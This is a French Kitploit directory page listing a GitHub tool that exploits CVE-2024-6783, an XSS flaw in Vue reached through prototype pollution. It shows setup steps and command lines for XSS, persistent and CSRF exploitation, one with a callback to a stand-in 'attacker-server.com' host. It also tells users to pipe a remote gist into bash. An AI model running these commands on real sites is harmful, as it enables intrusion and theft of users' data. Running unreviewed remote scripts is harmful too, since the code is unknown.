Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-6783 — CVE-2024-6783 - Vue CVE | Kitploit
Outils/GitHubGitHub/horkimhab/cve-2024-6783
Analyse des VulnérabilitésCTFApprentissage et ÉducationRessources OrganiséesParcours et CoursLabs et Pratique
GitHubhorkimhab/cve-2024-6783

CVE-2024-6783

CVE-2024-6783 - Vue CVE

Voir le dépôt
3il y a 1 moisPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-6783 - Vue CVE

Une vulnérabilité a été découverte dans Vue, qui permet à un attaquant d'effectuer une XSS via une pollution de prototype. L'attaquant pourrait modifier la chaîne de prototypes de certaines propriétés telles que Object.prototype.staticClass ou Object.prototype.staticStyle pour exécuter du code JavaScript arbitraire.

Faire un don

Soutenez la maintenance de ce projet via PayPal ou en scannant le code QR ci-dessous.

paypal

QR code pour le don

⚡ Utilisation simple

Utilisez ce projet uniquement dans des environnements sûrs et autorisés tels que :

  • Machines virtuelles locales
  • Conteneurs Docker
  • Configurations de laboratoire isolées
  • Environnements de tests d'intrusion autorisés

Exemple de configuration :

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783

# Le projet utilise python comme suit

# Créer un environnement virtuel
python -m venv venv

# Activer l'environnement virtuel

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Installer les dépendances
pip install -r requirements.txt

Télécharger l’outil

Exemple d'utilisation :

root@kitploit:~
# scan uniquement 
python cve-2024-6783.py -u https://example.com -v

# Scan & Exploitation XSS 
python cve-2024-6783.py -u https://example.com -e xss

# Exploitation XSS avec rappel (callback)
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback

# Serveur de rappel automatique
python cve-2024-6783.py -u https://example.com -e persistent -c auto

# Exploitation CSRF
python cve-2024-6783.py -u https://example.com -e csrf

# Scan complet et exploitation avec sortie détaillée
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html

Remarque :

  • Si vous clonez depuis un autre projet, vous devez exécuter curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y pour supprimer le .git du répertoire imbriqué
  • ex : cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Crédit ou Référence

  • https://www.herodevs.com/vulnerability-directory/cve-2024-6783?nes-for-vue-2
  • vue-template-compiler-patched-bio : https://github.com/bio/vue-template-compiler-patched

📚 Dépôt de recherche pédagogique en sécurité

Un dépôt pour apprendre, tester et rechercher des concepts de cybersécurité dans des environnements contrôlés.


⚠️ Avertissement de sécurité et juridique

Objectif

Ce dépôt est destiné uniquement à la recherche en sécurité pédagogique et autorisée.

Il est conçu pour aider les utilisateurs à apprendre :

  • Les vulnérabilités de sécurité
  • Les concepts de sandbox et d'isolation
  • Les pratiques de codage sécurisé et défensif

Utilisation autorisée uniquement

Utilisez ce dépôt uniquement dans des environnements où vous avez la permission, tels que :

  • Laboratoires personnels ou machines virtuelles
  • Environnements Docker ou isolés
  • Tests d'intrusion autorisés
  • Formation en cybersécurité ou recherche académique

Toute utilisation non autorisée ou illégale est strictement interdite.


Aucune responsabilité

L'auteur et les contributeurs ne sont pas responsables des dommages, mauvais usages, problèmes juridiques ou pertes causés par ce projet.

En utilisant ce dépôt, vous acceptez que :

  • Vous êtes responsable de vos propres actions
  • Vous l'utiliserez de manière légale et éthique
  • Le projet est fourni sans garantie

Utilisation éthique

Ce projet est destiné à :

  • La recherche en sécurité défensive
  • L'éducation à la cybersécurité
  • La sensibilisation aux vulnérabilités
  • La recherche sur les systèmes et logiciels sécurisés

Veuillez suivre les pratiques de divulgation responsable et vous conformer à toutes les lois applicables.


Contact

Pour une divulgation responsable ou une collaboration, contactez le mainteneur du dépôt via GitHub.